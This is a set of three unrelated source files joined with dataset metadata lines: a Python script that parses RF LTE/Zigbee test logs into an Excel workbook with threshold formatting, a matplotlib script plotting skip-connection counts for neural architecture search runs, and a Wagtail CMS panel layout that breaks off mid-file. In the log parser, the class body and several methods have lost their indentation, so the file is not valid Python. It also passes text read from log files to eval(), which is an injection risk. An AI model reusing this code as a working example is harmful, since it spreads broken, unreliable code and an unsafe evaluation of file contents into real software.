## Rev 1.0.0.1 25-Oct-2021 Willy
## First create.
##==============================================================================
import re
import os
import sys
import pandas as pd
import codecs
import time
import configparser
import openpyxl
from openpyxl.utils.dataframe import dataframe_to_rows
from openpyxl.styles import Font, Fill, colors
from openpyxl.formatting.rule import CellIsRule
# [Main]
g_strVersion = "3.0.0.1"    # tool version string
#[ParseLogPath]
g_strLogDir = "./Log/Pass"  # root folder holding one sub-folder of logs per serial number
class cLogParser:
listKey = ["Power_dBm_CH15", "Power_dBm_CH21", "Power_dBm_CH24", "Current_mA_CH15", "Current_mA_CH21", "Current_mA_CH24", "dBm_LNA_ON", "dBm_LNA_Off",
"Current_mA_3G_CH9750", "Current_mA_3G_CH2787", "Current_mA_2G_CH124", "dBm_CH9750", "dBm_CH2787", "dBm_2G_CH124", "dBm_CH124"]
listInfo, listLTE, listZigbee = [], [], []
    def __init__(self):
        """Parse every SN folder under g_strLogDir and merge the results."""
        # get directory names of TryingLog (first layer)
        listSN = os.listdir(g_strLogDir)

        # iterate through log files in a SN folder (second layer)
        self.parseLog(listSN)

        # merge data from two different log files
        self.mergeLogs()
    def parseLog(self, listSN):
        """
        Walk every serial-number folder in *listSN*, parse its LTE and Zigbee
        logs when present, and append one result dict per SN to
        self.listLTE / self.listZigbee (values stay None when not found).

        :param listSN: folder names under g_strLogDir, one per device SN.
        """
        printLog("[I][parseLog] ------- Start Parsing Log -------")
        strLTEName, strZigbeeName = "GFI20_RF_LTE.log", "GFI20_RF_Zigbee.log"
        try:
            for strSN in listSN:
                # Per-SN result rows, pre-filled with None placeholders.
                dictLTE = {
                    "SN" : strSN,
                    "dBm_CH9750" : None,
                    "dBm_CH2787" : None,
                    "dBm_2G_CH124" : None,
                    "Current_mA_3G_CH9750" : None,
                    "Current_mA_3G_CH2787" : None,
                    "Current_mA_2G_CH124" : None,
                    "dBm_CH124" : None }
                dictZigbee = {
                    "SN" : strSN,
                    "Power_dBm_CH15" : None,
                    "Power_dBm_CH21" : None,
                    "Power_dBm_CH24" : None,
                    "dBm_LNA_ON" : None,
                    "dBm_LNA_Off" : None,
                    "Current_mA_CH15" : None,
                    "Current_mA_CH21" : None,
                    "Current_mA_CH24" : None }

                b_hasLTE, b_hasZigbee = False, False  # flag for checking if the target log exists
                strSNLog = os.path.join(g_strLogDir, strSN)  # set abspath for SN logs
                for strLogName in os.listdir(strSNLog):
                    strLogPath = os.path.join(strSNLog, strLogName)

                    # check GFI20_RF_LTE.log exists. If not, flag = False and parse only SN.
                    reMatch = re.fullmatch("^.*RF_LTE\.log", strLogName)
                    if(reMatch != None):
                        self.parseLTE(dictLTE, strLogPath, strSN)
                        b_hasLTE = True

                    # parse GFI20_RF_Zigbee.log files
                    reMatch = re.fullmatch("^.*RF_Zigbee\.log", strLogName)
                    if(reMatch != None):
                        self.parseZigbee(dictZigbee, strLogPath, strSN)
                        b_hasZigbee = True

                # if log not exists, append initial dict
                self.listLTE.append(dictLTE)
                self.listZigbee.append(dictZigbee)

                # if there is no target log file in the folder, parse only SN
                if not b_hasLTE:
                    #listLTE.append({"SN": strSN})
                    printLog("[W][ParseLog] Cannot find log: %s" % os.path.join(strSN, strLTEName))
                if not b_hasZigbee:
                    #listZigbee.append({"SN" : strSN})
                    printLog("[W][ParseLog] Cannot find log: %s" % os.path.join(strSN, strZigbeeName))

            printLog("[I][parseLog] ------- Finish Parsing Log -------")
        except Exception as e:
            printLog("[E][parseLog] Unexpected Error: " + str(e))
    def parseLTE(self, dictLTE, strLTEPath, strSN):
        """
        Extract power / current / RSSI figures from one GFI20_RF_LTE.log into
        *dictLTE*.  Each "--- LTE_xx Freq yyy ---" banner opens a section and
        values are taken from the lines that follow it.
        listKey indexes used here: [8..10] = 3G/2G currents, [11..13] = dBm
        power readings, [14] = Rx RSSI on CH124.
        """
        printLog("[I][parseLTE] Parse LTE log: %s" % strLTEPath)
        try:
            # Postfix characters stripped from the raw value text per kind.
            listPostfix = [" \n", " A\n", " dBm\n"]
            with open(strLTEPath, encoding='big5') as log:  # big5 for windows
                content = log.readlines()
                for line in content:
                    re_power = "Power: [+-]?[0-9]+\.?[0-9]*"
                    re_current = "Current: [+-]?[0-9]+\.?[0-9]* A"
                    re_RX_RSSI = "Rx RSSI: [+-]?[0-9]+\.?[0-9]* dBm"
                    if re.search("-+ LTE_3G Freq 897.4 -+", line) != None:
                        idx = content.index(line)
                        tmp_content = content[idx:]  # slice from the banner onward
                        self.get_log_value(tmp_content, dictLTE, re_power, self.listKey[11], listPostfix[0], 1, False)
                        self.get_log_value(tmp_content, dictLTE, re_current, self.listKey[8], listPostfix[1], 1000, False)
                    if re.search("-+ LTE_3G Freq 1950 -+", line) != None:
                        idx = content.index(line)
                        tmp_content = content[idx:]
                        self.get_log_value(tmp_content, dictLTE, re_power, self.listKey[12], listPostfix[0], 1, False)
                        self.get_log_value(tmp_content, dictLTE, re_current, self.listKey[9], listPostfix[1], 1000, False)
                    if re.search("-+ LTE_2G Freq 914.8 -+", line) != None:
                        idx = content.index(line)
                        tmp_content = content[idx:]
                        self.get_log_value(tmp_content, dictLTE, re_power, self.listKey[13], listPostfix[0], 1, False)
                        self.get_log_value(tmp_content, dictLTE, re_current, self.listKey[10], listPostfix[1], 1000, False)
                    if re.search("-+ LTE_2G Freq 959.8 -+", line) != None:
                        idx = content.index(line)
                        tmp_content = content[idx:]
                        # b_getMulti=True: keep the last RSSI found in the section.
                        self.get_log_value(tmp_content, dictLTE, re_RX_RSSI, self.listKey[14], listPostfix[2], 1, True)
        except Exception as e:
            printLog("[E][parseLTE] Unexpected Error: " + str(e))
    def parseZigbee(self, dictZigbee, strZigBeePath, strSN):
        """
        Extract power / current / RSSI figures from one GFI20_RF_Zigbee.log
        into *dictZigbee*, section by banner, like parseLTE.
        listKey indexes used here: [0..2] = channel powers, [3..5] = channel
        currents, [6..7] = LNA on/off RSSI.
        """
        printLog("[I][parseZigbee] Parse Zigbee log: %s" % strZigBeePath)
        try:
            # Postfix characters stripped from the raw value text per kind.
            listPostfix = ["dBm\n", " A\n", " dBm\n"]
            with open(strZigBeePath, encoding="big5") as Zigbee:  # big5 for windows
                content = Zigbee.readlines()
                for line in content:
                    re_power = "Power: [+-]?[0-9]+\.?[0-9]* dBm"
                    re_current = "Current: [+-]?[0-9]+\.?[0-9]* A"
                    re_RX_RSSI = "Rx RSSI: [+-]?[0-9]+\.?[0-9]* dBm"
                    if re.search("-+ ZIGBEE_2450 Freq 2425 -+", line) != None:
                        idx = content.index(line)
                        tmp_content = content[idx:]  # slice from the banner onward
                        self.get_log_value(tmp_content, dictZigbee, re_power, self.listKey[0], listPostfix[0], 1, False)
                        self.get_log_value(tmp_content, dictZigbee, re_current, self.listKey[3], listPostfix[1], 1000, False)
                    if re.search("-+ ZIGBEE_2450 Freq 2455 -+", line) != None:
                        idx = content.index(line)
                        tmp_content = content[idx:]
                        self.get_log_value(tmp_content, dictZigbee, re_power, self.listKey[1], listPostfix[0], 1, False)
                        self.get_log_value(tmp_content, dictZigbee, re_current, self.listKey[4], listPostfix[1], 1000, False)
                    if re.search("-+ ZIGBEE_2450 Freq 2470 -+", line) != None:
                        idx = content.index(line)
                        tmp_content = content[idx:]
                        self.get_log_value(tmp_content, dictZigbee, re_power, self.listKey[2], listPostfix[0], 1, False)
                        self.get_log_value(tmp_content, dictZigbee, re_current, self.listKey[5], listPostfix[1], 1000, False)
                    if re.search("-+ LNA ON -+", line) != None:
                        idx = content.index(line)
                        tmp_content = content[idx:]
                        self.get_log_value(tmp_content, dictZigbee, re_RX_RSSI, self.listKey[6], listPostfix[2], 1, False)
                    if re.search("-+ LNA OFF -+", line) != None:
                        idx = content.index(line)
                        tmp_content = content[idx:]
                        self.get_log_value(tmp_content, dictZigbee, re_RX_RSSI, self.listKey[7], listPostfix[2], 1, False)
        except Exception as e:
            printLog("[E][parseZigbee] Unexpected Error: " + str(e))
def get_log_value(self, cut_content, dictInfo, re_target, strKey, strPostfix, nUnit, b_getMulti):
for line in cut_content:
# search pattern like "Power: (int/float) dBm"
if re.search(re_target, line) != None:
# get the figure of the line like "Power: 8.817 dBm\n"
fValue = eval(line.split(": ")[1].strip(strPostfix))
dictInfo[strKey] = fValue * nUnit
if not b_getMulti:
break;
    # merge two list of dict to single list of dict
    def mergeLogs(self):
        """Zip self.listLTE and self.listZigbee (same length, same SN order)
        into self.listInfo, producing one combined dict per SN."""
        try:
            printLog("[I][mergeLogs] ------- Merging two Log data -------")
            # listLTE and listZigbee both has same length
            self.listInfo = [None] * len(self.listLTE)
            for i in range (0, len(self.listLTE)):
                self.listLTE[i].update(self.listZigbee[i])  # merge two dict in place
                self.listInfo[i] = self.listLTE[i]
            printLog("[I][mergeLogs] ------- Merged two Log data -------")
        except Exception as e:
            printLog("[E][mergeLogs] Unexpected Error: " + str(e))
    #/====================================================================\#
    #|               Functions of parsing log to excel                    |#
    #\====================================================================/#
    def log_to_excel(self):
        """Write the merged log data to LTEV2.xlsx: one worksheet per
        measurement group, then apply INI-threshold conditional formatting."""
        printLog("[I][log_to_excel] ------- Parsing Log to Excel -------")
        dictThreshold = {}  # store INI threshold data for setting conditional formatting
        try:
            # ========== get the threshold data from INI ==========
            printLog("[I][log_to_excel] ----- INI reading -----")
            for key in self.listKey:
                dictThreshold[key] = self.readINI(key)
            printLog("[I][log_to_excel] ----- INI read -----")

            # ========== New Excel workbook and sheets ==========
            df_logInfo = pd.DataFrame(self.listInfo)  # listInfo -> list of dict
            listSheetName = ["Zigbee_Power_Current", "Zigbee_LAN", "LTE_Current", "LTE_dBm"]
            listCol = [self.listKey[:6], self.listKey[6:8], self.listKey[8:11], self.listKey[11:15]]  # columns for each sheet above

            wb = openpyxl.Workbook()  # create a new Excel workbook
            wb.remove(wb['Sheet'])  # remove the default sheet when start a workbook

            printLog("[I][log_to_excel] ----- Excel Sheet Creating -----")
            for i in range(0, len(listSheetName)):
                # Every sheet leads with the SN column followed by its metrics.
                self.newSheet(wb, listSheetName[i], df_logInfo[["SN"] + listCol[i]])
            printLog("[I][log_to_excel] ----- Excel Sheet Created -----")

            # modify cell font-color according to threshold that parsed from INI
            self.set_threshold_to_excel(wb, dictThreshold)

            wb.save('LTEV2.xlsx')  # save the workbook as an excel file
            printLog("[I][log_to_excel] ------- Parsed Log to Excel -------")
        except Exception as e:
            printLog("[E][log_to_excel] Unexpected Error: " + str(e))
    # read INI values one by one by giving keys, then store to var dictThreshold
    def readINI(self, strKey):
        """
        Read one threshold value for *strKey* from the [Method<g_nMethodIndex>]
        section of the INI at g_strINIPath.  Expected format "<low>,<high>".
        Exits the process (sys.exit) on a malformed or unreadable value.

        :return: the raw "low,high" threshold string.
        """
        try:
            config = configparser.ConfigParser()
            config.read(g_strINIPath)

            strMethod = 'Method%s' % g_nMethodIndex
            strValue = config.get(strMethod, strKey)

            # search pattern like "+-(int/float),+-(int/float)"
            if re.fullmatch("[+-]?[0-9]+\.?[0-9]*,[+-]?[0-9]+\.?[0-9]*", strValue):
                printLog("[I][readINI] %s = %s" % (strKey, strValue))
                return strValue
            else:
                printLog("[W][readINI] Read %s Fail !!" % strKey)
                # SystemExit is not caught by the `except Exception` below.
                sys.exit("Read %s Fail !!" % strKey)
        except Exception as e:
            printLog("[E][readINI] Error: %s" % str(e))
            sys.exit("Error: %s" % str(e))
# new worksheets by DataFrame
def newSheet(self, workbook, strSheetName, df_SheetCol):
try:
workbook.create_sheet(strSheetName)
for row in dataframe_to_rows(df_SheetCol, index=False, header=True):
workbook[strSheetName].append(row)
printLog("[I][newSheet] Sheet: %s Created" % strSheetName)
except Exception as e:
printLog("[E][newSheet] Unexpected Error: " + str(e))
# set conditional formating for sheets by dictionay containg thershold data
def set_threshold_to_excel(self, workbook, dictThreshold):
try:
printLog("[I][set_threshold_to_excel] ----- threshold setting -----")
# iterate through every worksheet to set conditional formatting
for ws in workbook.worksheets:
printLog("[I][set_threshold_to_excel] setting worksheet: %s" % ws.title)
# iterate from Col 2 since Col 1 is the Serial Number(SN)
for col in ws.iter_cols(min_row=1, max_row=ws.max_row, min_col=2, max_col=ws.max_column):
strStart, strEnd = None, None # set the test range for cell e.g. A1:A10
istInterval = [] # set the threshold range for the formula below
# check the column is not empty, col[0] is column name
if len(col) > 1:
strStart = col[1].coordinate # set starting cell for thershold testing
strEnd = col[-1].coordinate # set ending cell
# get the thershold and store as interval for the formula below
strThreshold = dictThreshold[col[0].value] # get the test thershold by the column name(col[0])
listInterval = strThreshold.split(",")
red_text = Font(color="9C0006") # font-color: RED
range_string = "%s:%s" % (strStart, strEnd) # the value would be like A1:A10
ws.conditional_formatting.add(range_string,
CellIsRule(operator='notBetween', formula=listInterval, stopIfTrue=True, font=red_text))
printLog("[I][set_threshold_to_excel] ----- threshold set -----")
except Exception as e:
printLog("[E][set_threshold_to_excel] Unexpected Error: " + str(e))
#/====================================================================\#
#| Functions of printing log of LTE.py |#
#\====================================================================/#
def getDateTimeFormat():
    """Return the current local time as a "[YYYY/MM/DD HH:MM:SS]" prefix."""
    now = time.localtime()
    return "[" + time.strftime("%Y/%m/%d %H:%M:%S", now) + "]"
def printLog(strPrintLine):
    """Echo *strPrintLine* to stdout and append it, prefixed with a
    timestamp, to the "<g_strFileName>.log" file in the working directory.
    """
    # 'with' guarantees the handle is closed even if the write fails;
    # the previous version also computed an unused local file name
    with codecs.open(g_strFileName + ".log", 'a', "utf-8") as fileLog:
        print(strPrintLine)
        fileLog.write("%s%s\r\n" % (getDateTimeFormat(), strPrintLine))
if __name__ == "__main__":
    # NOTE(review): 'global' at module level is a no-op; kept to document
    # that these names are read by the functions above.
    global g_strFileName, g_strINIPath, g_nMethodIndex
    g_strFileName = os.path.basename(__file__).split('.')[0]  # script name without extension
    g_strINIPath = os.path.join(os.getcwd(), g_strFileName + ".ini")  # INI expected in the CWD
    g_nMethodIndex = 1  # which [MethodN] section of the INI to read
    printLog("========== Start ==========")
    printLog("[I][main] Python " + sys.version)
    printLog("[I][main] %s.py %s" % (g_strFileName, g_strVersion))
    # ------------ find the target file --------------
    try:
        LogParser = cLogParser()
        LogParser.log_to_excel()
    except Exception as e:
        printLog("[E][main] Unexpected Error: " + str(e))
    printLog("========== End ==========")
| 2 | 2 |
cnn/test2.py | INFINITSY/darts | 0 | 17608 | <reponame>INFINITSY/darts
import matplotlib.pyplot as plt
import numpy as np
# Number of skip-connections found in the searched cell, sampled every
# 5 epochs, for several NAS runs (DARTS / MiLeNAS, with and without Adas).
# darts_025 = [0, 0, 0, 0, 2, 5, 6, 7, 8]
darts_025 = [0, 0, 0, 2, 3, 5, 7, 8]
darts_05 = [0, 0, 3, 3, 4, 4, 5, 7, 7]
adas_025_9 = [0, 0, 0, 0, 3, 5, 7]
adas_05_9 = [0, 0, 1, 4, 5, 6, 6, 7, 7, 7, 7]
adas_05_95 = []
adas_05_97 = [0, 0, 0, 2, 4, 4, 4, 4, 4, 6, 8]
mile = [0, 0, 0, 2, 4, 4, 4, 3, 4, 4, 4]
mile_adas_025_9 = [0, 0, 0, 0, 3, 4, 5, 5, 6, 6, 6]
mile_adas_05_9 = [0, 0, 0, 3, 4, 5, 5, 5, 5, 6, 6]
mile_adas_05_95 = [0, 0, 0, 0, 1, 1, 5, 5, 6, 6, 6]
mile_adas_05_97 = [0, 0, 0, 0, 0, 3, 3, 4, 4, 4, 4]
# x axis: epochs 0..35 for the 8-point series, 0..50 for the 11-point
# series; commented calls below are alternative runs kept for toggling.
plt.plot(range(0, 36, 5), darts_025, '-o', label='DARTS, lr: 0.025')
# plt.plot(range(0, 41, 5), darts_05, '-o', label='DARTS, lr: 0.05')
#
# # plt.plot(range(0, 31, 5), adas_025_9, '-o', label='DARTS+Adas, lr: 0.025, beta: 0.9')
# # plt.plot(range(0, 51, 5), adas_05_9, '-o', label='DARTS+Adas, lr: 0.05, beta: 0.9')
# # plt.plot(range(0, 51, 5), adas_05_97, '-o', label='DARTS+Adas, lr: 0.05, beta: 0.97')
plt.plot(range(0, 51, 5), mile, '--o', label='MiLeNAS, lr: 0.025')
plt.plot(range(0, 51, 5), mile_adas_025_9, '--o', label='MiLeNAS+Adas, lr: 0.025, beta: 0.9')
plt.plot(range(0, 51, 5), mile_adas_05_9, '--o', label='MiLeNAS+Adas, lr: 0.05, beta: 0.9')
plt.plot(range(0, 51, 5), mile_adas_05_95, '--o', label='MiLeNAS+Adas, lr: 0.05, beta: 0.95')
plt.plot(range(0, 51, 5), mile_adas_05_97, '--o', linewidth=3.0, label='MiLeNAS+Adas, lr: 0.05, beta: 0.97')
plt.xlabel('Epoch')
plt.ylabel('#Skip-connection')
plt.legend()
plt.show()
| 2.578125 | 3 |
great_international/panels/capital_invest.py | uktrade/directory-cms | 6 | 17609 | from wagtail.admin.edit_handlers import (
InlinePanel, HelpPanel, FieldPanel, FieldRowPanel, MultiFieldPanel,
PageChooserPanel,
)
from wagtail.documents.edit_handlers import DocumentChooserPanel
from wagtail.images.edit_handlers import ImageChooserPanel
from core.helpers import make_translated_interface
from core.panels import SearchEngineOptimisationPanel
class InternationalCapitalInvestLandingPagePanels:
    """Wagtail edit-handler layout for the Capital Invest landing page.

    Pure declarative configuration: groups the page's fields into the
    hero, reasons-to-invest, regions, energy, homes and contact sections.
    """
    content_panels = [
        FieldPanel('title'),
        FieldPanel('breadcrumbs_label'),
        MultiFieldPanel(
            heading="Hero",
            children=[
                ImageChooserPanel('hero_image'),
                FieldPanel('hero_title'),
                FieldPanel('hero_subheading'),
                FieldPanel('hero_subtitle'),
                FieldPanel('hero_cta_text'),
                FieldPanel('hero_cta_link'),
            ]
        ),
        MultiFieldPanel(
            heading="Reason to invest in the UK section",
            classname='collapsible',
            children=[
                HelpPanel('Required fields for section to show: '
                          'Reason to Invest Title, Reason to Invest Content'),
                FieldPanel('reason_to_invest_section_title'),
                FieldPanel('reason_to_invest_section_intro'),
                FieldPanel('reason_to_invest_section_content'),
                ImageChooserPanel('reason_to_invest_section_image'),
                FieldPanel('how_we_help_title'),
                FieldPanel('how_we_help_intro'),
                HelpPanel('Each icon requires corresponding text to show '
                          'on page'),
                FieldRowPanel([
                    MultiFieldPanel([
                        ImageChooserPanel('how_we_help_one_icon'),
                        FieldPanel('how_we_help_one_text'),
                    ]),
                    MultiFieldPanel([
                        ImageChooserPanel('how_we_help_two_icon'),
                        FieldPanel('how_we_help_two_text'),
                    ]),
                ]),
                FieldRowPanel([
                    MultiFieldPanel([
                        ImageChooserPanel('how_we_help_three_icon'),
                        FieldPanel('how_we_help_three_text'),
                    ]),
                    MultiFieldPanel([
                        ImageChooserPanel('how_we_help_four_icon'),
                        FieldPanel('how_we_help_four_text'),
                    ]),
                ]),
                FieldPanel('how_we_help_cta_text'),
                FieldPanel('how_we_help_cta_link'),
            ]
        ),
        MultiFieldPanel(
            heading="Investment Opportunities by regions",
            classname='collapsible',
            children=[
                HelpPanel('Required fields for section to show: '
                          'Region Opportunity Title, 1 Related Region'),
                FieldPanel('region_ops_section_title'),
                FieldPanel('region_ops_section_intro'),
                InlinePanel(
                    'added_region_card_fields',
                    label="Region card fields"
                ),
            ]
        ),
        MultiFieldPanel(
            heading="Informative banner",
            children=[
                FieldPanel('banner_information')
            ],
        ),
        MultiFieldPanel(
            heading="Related region pages",
            classname='collapsible collapsed',
            children=[
                HelpPanel('Please use this to link to a related region, '
                          'rather than adding in manually the region title, '
                          'image and text in the above section when the '
                          'capital invest region pages are available'),
                InlinePanel(
                    'added_regions',
                    label="Related Regions"
                ),
            ]
        ),
        MultiFieldPanel(
            heading="Energy Sector",
            classname='collapsible',
            children=[
                HelpPanel('Required fields for section to show: '
                          'Energy Sector Title, Energy Sector Content'),
                FieldPanel('energy_sector_title'),
                FieldPanel('energy_sector_content'),
                ImageChooserPanel('energy_sector_image'),
                # typo fix: this help text is shown to editors ("teh" -> "the")
                HelpPanel('CTA requires text and PDF to show on the page.'),
                FieldPanel('energy_sector_cta_text'),
                DocumentChooserPanel('energy_sector_pdf_document'),
            ]
        ),
        MultiFieldPanel(
            heading="Homes in England Section",
            classname='collapsible',
            children=[
                HelpPanel('Required fields for section to show: '
                          'Homes In England Section Title, Title and PDF '
                          'for each card'),
                FieldPanel('homes_in_england_section_title'),
                InlinePanel(
                    'added_homes_in_england_card_fields',
                    label="Homes In England cards"
                )
            ]
        ),
        MultiFieldPanel(
            heading="Contact Section",
            classname='collapsible collapsed',
            children=[
                HelpPanel('Required fields for section to show: '
                          'Contact Title, Contact Text'),
                FieldPanel('contact_section_title'),
                FieldPanel('contact_section_text'),
                FieldPanel('contact_section_cta_text')
            ]
        ),
        SearchEngineOptimisationPanel()
    ]

    settings_panels = [
        FieldPanel('slug'),
    ]

    edit_handler = make_translated_interface(
        content_panels=content_panels,
        settings_panels=settings_panels
    )
class CapitalInvestRegionPagePanels:
    """Wagtail edit-handler layout for a Capital Invest region page.

    Declarative configuration only: hero, region summary, statistics
    grids, accordions, case study and contact sections.
    """
    content_panels = [
        FieldPanel('title'),
        FieldPanel('breadcrumbs_label'),
        MultiFieldPanel(
            heading="Hero",
            children=[
                FieldPanel('hero_title'),
                ImageChooserPanel('hero_image'),
            ],
        ),
        FieldPanel('featured_description'),
        MultiFieldPanel(
            heading="Region summary",
            classname='collapsible',
            children=[
                HelpPanel('Required fields for section to show: '
                          'Region Summary Section Content'),
                ImageChooserPanel('region_summary_section_image'),
                FieldPanel('region_summary_section_intro'),
                FieldPanel('region_summary_section_content'),
            ],
        ),
        MultiFieldPanel(
            heading="Investment opportunities",
            classname='collapsible collapsed',
            children=[
                FieldPanel('investment_opps_title'),
                FieldPanel('investment_opps_intro'),
            ]
        ),
        MultiFieldPanel(
            heading="Economics Statistics",
            classname='collapsible',
            children=[
                HelpPanel('Required: at least 4 statistics for the section to show'),
                FieldRowPanel([
                    MultiFieldPanel([
                        FieldPanel('economics_stat_1_heading'),
                        FieldPanel('economics_stat_1_number'),
                        FieldPanel('economics_stat_1_smallprint'),
                    ]),
                    MultiFieldPanel([
                        FieldPanel('economics_stat_2_heading'),
                        FieldPanel('economics_stat_2_number'),
                        FieldPanel('economics_stat_2_smallprint'),
                    ]),
                    MultiFieldPanel([
                        FieldPanel('economics_stat_3_heading'),
                        FieldPanel('economics_stat_3_number'),
                        FieldPanel('economics_stat_3_smallprint'),
                    ]),
                ]),
                FieldRowPanel([
                    MultiFieldPanel([
                        FieldPanel('economics_stat_4_heading'),
                        FieldPanel('economics_stat_4_number'),
                        FieldPanel('economics_stat_4_smallprint'),
                    ]),
                    MultiFieldPanel([
                        FieldPanel('economics_stat_5_heading'),
                        FieldPanel('economics_stat_5_number'),
                        FieldPanel('economics_stat_5_smallprint'),
                    ]),
                    MultiFieldPanel([
                        FieldPanel('economics_stat_6_heading'),
                        FieldPanel('economics_stat_6_number'),
                        FieldPanel('economics_stat_6_smallprint'),
                    ]),
                ]),
            ],
        ),
        MultiFieldPanel(
            heading="Location Statistics",
            classname='collapsible',
            children=[
                HelpPanel('Required: at least 4 statistics for the section to show'),
                FieldRowPanel([
                    MultiFieldPanel([
                        FieldPanel('location_stat_1_heading'),
                        FieldPanel('location_stat_1_number'),
                        FieldPanel('location_stat_1_smallprint'),
                    ]),
                    MultiFieldPanel([
                        FieldPanel('location_stat_2_heading'),
                        FieldPanel('location_stat_2_number'),
                        FieldPanel('location_stat_2_smallprint'),
                    ]),
                    MultiFieldPanel([
                        FieldPanel('location_stat_3_heading'),
                        FieldPanel('location_stat_3_number'),
                        FieldPanel('location_stat_3_smallprint'),
                    ]),
                ]),
                FieldRowPanel([
                    MultiFieldPanel([
                        FieldPanel('location_stat_4_heading'),
                        FieldPanel('location_stat_4_number'),
                        FieldPanel('location_stat_4_smallprint'),
                    ]),
                    MultiFieldPanel([
                        FieldPanel('location_stat_5_heading'),
                        FieldPanel('location_stat_5_number'),
                        FieldPanel('location_stat_5_smallprint'),
                    ]),
                    MultiFieldPanel([
                        FieldPanel('location_stat_6_heading'),
                        FieldPanel('location_stat_6_number'),
                        FieldPanel('location_stat_6_smallprint'),
                    ]),
                ]),
            ],
        ),
        MultiFieldPanel(
            heading="Extra optional Property and Infrastructure section",
            classname='collapsible',
            children=[
                HelpPanel('Required fields for section to show: '
                          'Property and Infrastructure Section Title, '
                          'Property and Infrastructure Section Content'),
                ImageChooserPanel('property_and_infrastructure_section_image'),
                FieldPanel('property_and_infrastructure_section_title'),
                FieldPanel('property_and_infrastructure_section_content'),
            ],
        ),
        MultiFieldPanel(
            heading="Accordions subsections",
            classname='collapsible collapsed',
            children=[
                HelpPanel('Required: subsections title and at least one title and content for an accordion to show'),
                FieldPanel('subsections_title'),
                FieldRowPanel([
                    MultiFieldPanel([
                        FieldPanel('sub_section_one_title'),
                        ImageChooserPanel('sub_section_one_icon'),
                        FieldPanel('sub_section_one_content')
                    ]),
                    MultiFieldPanel([
                        FieldPanel('sub_section_two_title'),
                        ImageChooserPanel('sub_section_two_icon'),
                        FieldPanel('sub_section_two_content')
                    ]),
                    MultiFieldPanel([
                        FieldPanel('sub_section_three_title'),
                        ImageChooserPanel('sub_section_three_icon'),
                        FieldPanel('sub_section_three_content')
                    ]),
                ]),
            ]
        ),
        MultiFieldPanel(
            heading="Case study",
            classname='collapsible',
            children=[
                HelpPanel('Required fields for section to show: '
                          'Case Study Image, Case Study Title'),
                ImageChooserPanel('case_study_image'),
                FieldPanel('case_study_title'),
                FieldPanel('case_study_text'),
                HelpPanel('Cta\'s require both text and a link to show '
                          'on page. '),
                FieldPanel('case_study_cta_text'),
                FieldPanel('case_study_cta_link'),
            ],
        ),
        MultiFieldPanel(
            heading="Contact",
            classname='collapsible',
            children=[
                HelpPanel('Required fields for section to show: '
                          'Contact Title, Contact Text'),
                FieldPanel('contact_title'),
                FieldPanel('contact_text'),
                FieldPanel('contact_cta_text'),
                FieldPanel('contact_cta_link'),
            ],
        ),
        SearchEngineOptimisationPanel()
    ]

    settings_panels = [
        FieldPanel('slug'),
    ]

    edit_handler = make_translated_interface(
        content_panels=content_panels,
        settings_panels=settings_panels
    )
class CapitalInvestOpportunityListingPagePanels:
    """Wagtail edit-handler layout for the opportunity listing page."""
    content_panels = [
        FieldPanel('title'),
        FieldPanel('breadcrumbs_label'),
        FieldPanel('search_results_title'),
        SearchEngineOptimisationPanel()
    ]

    settings_panels = [
        FieldPanel('slug'),
    ]

    edit_handler = make_translated_interface(
        content_panels=content_panels,
        settings_panels=settings_panels
    )
class CapitalInvestOpportunityPagePanels:
    """Wagtail edit-handler layout for a single investment opportunity page.

    Declarative configuration only: related sector/region links, hero,
    summary, detail grids, project details, similar projects, case study
    and contact sections.
    """
    content_panels = [
        FieldPanel('title'),
        MultiFieldPanel(
            heading="Related sector",
            classname='collapsible collapsed',
            children=[
                InlinePanel('related_sectors', label="Related Sectors"),
            ],
        ),
        MultiFieldPanel(
            heading="Related region",
            classname='collapsible collapsed',
            children=[
                PageChooserPanel(
                    'related_region',
                    [
                        'great_international.'
                        'AboutUkRegionPage'
                    ]
                ),
            ],
        ),
        FieldPanel('breadcrumbs_label'),
        MultiFieldPanel(
            heading="Hero",
            children=[
                ImageChooserPanel('hero_image'),
                FieldPanel('hero_title'),
            ],
        ),
        MultiFieldPanel(
            heading="Opportunity summary",
            classname='collapsible',
            children=[
                HelpPanel('Required fields for section to show: '
                          'Opportunity Summary Intro'),
                FieldPanel('opportunity_summary_intro'),
                FieldPanel('opportunity_summary_content'),
                ImageChooserPanel('opportunity_summary_image'),
            ],
        ),
        MultiFieldPanel(
            heading="Opportunity Details",
            classname='collapsible',
            children=[
                HelpPanel('Icons require the corresponding text to show on '
                          'page'),
                FieldRowPanel([
                    MultiFieldPanel([
                        ImageChooserPanel('location_icon'),
                        FieldPanel('location_heading'),
                        FieldPanel('location'),
                    ]),
                    MultiFieldPanel([
                        ImageChooserPanel('project_promoter_icon'),
                        FieldPanel('project_promoter_heading'),
                        FieldPanel('project_promoter'),
                    ]),
                    MultiFieldPanel([
                        ImageChooserPanel('scale_icon'),
                        FieldPanel('scale_heading'),
                        FieldPanel('scale'),
                        FieldPanel('scale_value'),
                    ]),
                ]),
                FieldRowPanel([
                    MultiFieldPanel([
                        ImageChooserPanel('sector_icon'),
                        FieldPanel('sector_heading'),
                        InlinePanel('related_sub_sectors',
                                    label="Related Sectors"),
                    ]),
                    MultiFieldPanel([
                        ImageChooserPanel('investment_type_icon'),
                        FieldPanel('investment_type_heading'),
                        FieldPanel('investment_type'),
                    ]),
                    MultiFieldPanel([
                        ImageChooserPanel('planning_status_icon'),
                        FieldPanel('planning_status_heading'),
                        FieldPanel('planning_status'),
                    ]),
                ]),
            ],
        ),
        MultiFieldPanel(
            heading="Project Details",
            classname='collapsible',
            children=[
                HelpPanel('Title requires corresponding text to show on page'),
                FieldPanel('project_background_title'),
                FieldPanel('project_background_intro'),
                FieldRowPanel([
                    MultiFieldPanel([
                        FieldPanel('project_description_title'),
                        FieldPanel('project_description_content'),
                    ]),
                    MultiFieldPanel([
                        FieldPanel('project_promoter_title'),
                        FieldPanel('project_promoter_content'),
                    ]),
                ]),
                ImageChooserPanel('project_image')
            ],
        ),
        MultiFieldPanel(
            heading="Similar projects",
            classname='collapsible',
            children=[
                HelpPanel('Section shows if there are opportunities with the same related sector. '
                          'They are chosen randomly. Cta\'s require both text and a link to show '
                          'on page. '),
                FieldPanel('similar_projects_cta_text'),
                FieldPanel('similar_projects_cta_link'),
            ],
        ),
        MultiFieldPanel(
            heading="Case study",
            classname='collapsible',
            children=[
                HelpPanel('Required fields for section to show: '
                          'Case Study Image, Case Study Title'),
                ImageChooserPanel('case_study_image'),
                FieldPanel('case_study_title'),
                FieldPanel('case_study_text'),
                HelpPanel('Cta\'s require both text and a link to show '
                          'on page. '),
